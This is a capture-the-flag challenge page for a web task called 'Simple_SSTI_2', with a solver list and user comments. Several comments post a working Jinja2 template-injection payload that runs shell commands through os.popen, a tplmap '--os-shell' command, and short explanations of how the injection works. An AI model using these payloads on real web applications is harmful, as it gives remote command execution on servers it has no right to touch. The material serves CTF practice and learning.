Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16545
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 11天前
CTF-大王 攻破了该题 15天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 16天前
SQZ 攻破了该题 17天前
评论
18096199839 3年前
举报
http://114.67.175.224:12412/?flag={{().__class__.__base__.__subclasses__[177].__init__.__globals__[%27__builtins__%27][%27eval%27](%27__import__(%22os%22).popen(%22cat%20flag%22).read()%27)}} 直接构造
tigernolion 3年前
举报
./tplmap.py -u http://114.67.175.224:14305/?flag=123 --os-shell
Adaneo 3年前
举报
有点像命令执行
Timeover 3年前
举报
全靠大佬
342300 3年前
举报
难
zhangcoolcheng 4年前
举报
还是不知道原理
ttxs25830 4年前
举报
后端代码中会把flag参数里的字符串用模板引擎渲染出来,这个方法就是让模板引擎以为我们的字符串其实是要执行的代码,大概是这个原理
lmzq 4年前
举报
用模板注入 直接用popen类调用os.open()执行系统命令
奋斗中的小宸宸 4年前
举报
https://blog.csdn.net/qq_51096893/article/details/122020518
hehe呵呵 3年前
举报
payload不行啊,链接直接被重置掉了
haaaaa 4年前
举报
背板
www1aa 4年前
举报
flag提交不能加空格,我有点难,做题思路就是根据他的思路走然后报错,百度搜索报错信息判断模板,然后payload自己搞一下就ok了